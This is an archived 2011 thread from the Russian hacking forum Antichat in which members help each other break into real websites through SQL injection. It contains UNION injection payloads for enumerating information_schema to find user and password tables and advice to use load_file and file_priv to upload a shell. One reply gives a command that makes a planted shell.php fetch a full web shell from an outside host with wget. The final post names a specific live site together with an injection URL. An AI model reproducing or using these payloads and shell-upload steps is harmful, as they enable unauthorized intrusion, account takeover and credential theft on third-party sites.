ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.01.2011, 10:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
183
Репутация:
0
|
|
Сообщение от Nightmarе
Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))
naprimer vot tak :
Сообщение от None
/news.php?id=2+union+select+0,1,group_concat(0x3a,t able_name)+from+information_schema.tables+where+ta ble_name+like+table_name-hex
|
|
|
|
02.01.2011, 11:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
привет залил команду через бд, получился файл shell.php
подскажите как пользоваться ею чтобы залить полноценный веб шелл? адрес вебшелла есть
xxx.narod.ru/1.php |
|
|
|
02.01.2011, 12:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
прочитай про wget или fetch )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
02.01.2011, 13:24
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от noviyuser
noviyuser said:
привет залил команду через бд, получился файл shell.php
подскажите как пользоваться ею чтобы залить полноценный веб шелл? адрес вебшелла есть
xxx.narod.ru/1.php
http://site.ru/shell.php?cmd=wget http://xxx.narod.ru/1.php
|
|
|
|
02.01.2011, 14:13
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от Nightmarе
Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))
Раз у тебя столько баз,значит и mysql скорее всего тоже доступна.
Значит пробуй лоад_файл,ищи пути,когда найдешь проверяй файл_прив и если все ок то лей шелл.Если не вышло,попробуй найти пыхпмайадмин,сбрутив хеши майскул юзверов.
|
|
|
|
02.01.2011, 15:46
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
docw_p
Так не получится, так как столбцы имеют вид, который был предоставлен Nightmarе.
Nightmarе
В таких случаях можно сделать примерно так
Код:
Code:
select distinct(table_name) from information_schema.columns where column_name like '%user%'
Где символ "%" справа и слева означает, что слово "user" может быть и в начале, и в середине и в конце колонки.
Но я бы искал не по слову "user", если тебя интересуют все пользователи, а не только форума, а по паролю запросом вида:
Код:
Code:
select distinct(table_name) from information_schema.columns where column_name like '%pass%'
|
|
|
|
02.01.2011, 18:26
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Nightmarе
Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))
я бы сделал вот так, если по каким то конкретным именам таблиц:
SELECT group_concat(table_schema) from information_schema.tables where table_name=0x...
либо если не слеширует то через Like
|
|
|
|
02.01.2011, 18:57
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Nightmarе
Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))
-1'+union+select+group_concat(table_schema,0x2d,tab le_name,0x2d,column_name),2+from+information_schem a.columns+where+table_name+like+'%user%'+or+column _name+like+'%user%'--+
|
|
|
|
02.01.2011, 20:23
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Я часто делаю так: заменяю все цифры на user(), затем открываю исходник и ищу по символу @. М.б. ламерский способ, но меня выручал всегда.
Кста, в твоем примере там ты указываешь null, а надо цифры.
Сообщение от Nightmarе
Nightmarе said:
Столкнулся с такой проблемой, нашёл SQL на одном сайте, на этом же сайте крутится форум, админский акк мне и надо заполучить.
Но не тут то было, на сайте 11957 баз данных (да, вы не ослышались 11957 баз, это ахуеть надо, сам не верю), и они все имеют вид db1,db2,db3 ... db11957
Собственно, как мне найти все базы данных, где встречаются в таблицах слова user и users ?
Ну уж явно не в ручную 11957 ковырять =)))
Скорей всего, у тебя есть доступ к базам (обычно можно получить только имена) других сайтов на этом серваке. |
|
|
|
02.01.2011, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от eclipse
eclipse said:
null я там указал чтоб хоть что-то показывал, когда просто цифры - ничего не показывается, а тут - во как много всякой всячины)) спасибо за метод, как нить заюзаю))
--upd-- к вопросам
есть такая скуля
Код:
Code:
?location_id=1' union select 1,2,3,4,5,6,7,8,9,10+--+*/
уязвимы столбцы 1 и 4
пытаюсь подставить имена столбцов
Код:
Code:
?location_id=1' union select name,2,3,4,5,6,7,8,9,10+--+*/
Отвечает ошибкой
Код:
Code:
Error: Bad query. Unknown column 'name' in 'field list'
пытаюсь так:
Код:
Code:
?location_id=1' union select table,2,3,4,5,6,7,8,9,10+--+*/
отвечает ошибкой
Код:
Code:
Error: Bad query. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table,2,3,4,5,6,7,8,9,10 -- */' ORDER BY `location_name`' at line 1
Значит ли это что в таблице есть столбец с именем table и это имя (table) как бы фильтруется? или че за фигня?
Я к этому пришел когда попытался прочитать данные из information_schema и нифига у меня не вышло
ссылка на уязвимый сайт
http://www.elephant.se http://www.elephant.se/location2.php?location_id=513'+union+select+1,2,3, table_name,5,6,7,8,9,10++from+information_schema.t ables--+
иди млять и читай мануалы по скулям, сколько можно постить бред..и спрашивать то что уже миллион раз в данной теме перемалывали...стандартная скуля...нормально составь запрос...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
